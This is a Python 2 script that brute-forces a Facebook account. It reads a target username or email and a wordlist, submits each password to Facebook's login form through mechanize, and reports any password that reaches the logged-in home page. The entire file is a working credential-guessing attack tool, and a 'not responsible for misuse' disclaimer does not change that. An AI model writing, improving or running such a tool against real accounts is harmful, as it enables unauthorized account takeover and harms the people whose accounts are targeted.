#!/usr/bin/python
# -*- coding: utf-8 -*-
        
        
        #############################################
        #    ð•®ð–—ð–Šð–†ð–™ð–”ð–—. ð‘¹ð’‚ð’‡ð’Šð’ ð‘¨ð’‰ð’Žð’†ð’…                       #                 #
        #    ð•´ð–“ð–˜ð–™ð–†ð–Œð–—ð–†ð–’, ðŸ‘‘RaFiN ChowdhuryðŸ’«           #
        #    ð–„ð–”ð–šð–™ð–šð–‡ð–Š. ð¹ð¸ð¸ð¿ð¼ð‘ðºð‘† ð¶ð‘…ð¸ð´ð‘‡ð¼ð‘‚ð‘              #
        #    ð•±ð–†ð–ˆð–Šð–‡ð–”ð–”ð–. I.FueK.YoUr.MiNd.BnXD           #
        #    ð•²ð–Žð–™ð–ð–šð–‡. https://github.com/Shymon-Hasan  #
        #############################################


import time
import os

os.system('clear')
time.sleep(0.5)
try:
    import mechanize
except ModuleNotFoundError:
    print '[!] Module >Mechanize< Not Found!\n    This module is only available in python 2.x :/\n    Please install mechanize (pip install mechanize) and run the program with python2'
    exit()

time.sleep(0.5)
user = raw_input('[ðŸ’€] Target Username/ID/Email >>?? ')
time.sleep(0.8)
wrdlstFileName = raw_input('\n[ðŸ’€] Wordlist Type SH.txt >> ')
try:
    wordlist = open(wrdlstFileName, 'r')
except FileNotFoundError:
    print ('\n[!] File Not Found!')
    exit()

time.sleep(0.8)
print '\n\nCracking '+user+' Now...'

time.sleep(1)
print '\nIM NOT RESPONSIBLE FOR ANY MISS USE RAFIN VAU\n'
for password in wordlist:
    if password == '' or password == ' ':
        pass
    else:
        try:
            browser = mechanize.Browser()
            browser.set_handle_robots(False)
            browser.addheaders = [('User-agent', "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36")]
            fb = browser.open('https://facebook.com')
            dos = open('Facebook-Log.txt', 'w+')
            browser.select_form(nr=0)
            browser.form['email'] = user
            browser.form['pass'] = password
            browser.method = 'POST'
            browser.submit()
            dos.write(browser.open('https://facebook.com').read())
            dos.seek(0)
            text = dos.read().decode('UTF-8')
            if text.find('home_icon', 0, len(text)) != -1:
                print '[+] Password Found > '+password 
                dos.close()
                os.system('rm Facebook-Log.txt || del Facebook-Log.txt')
                exit()
            else:
                print "[!] Wrong Password! > "+str(password)
        except KeyboardInterrupt:
            print '\n#############################################\n   Exiting..'
            dos.close()
            os.system('rm Facebook-Log.txt || del Facebook-Log.txt')
            exit()

time.sleep(1)
print 'Sorry, none of the passswords in your wordlist is right.'
time.sleep(0.8)
dos.close()
os.system('rm Facebook-Log.txt || del Facebook-Log.txt')
exit()
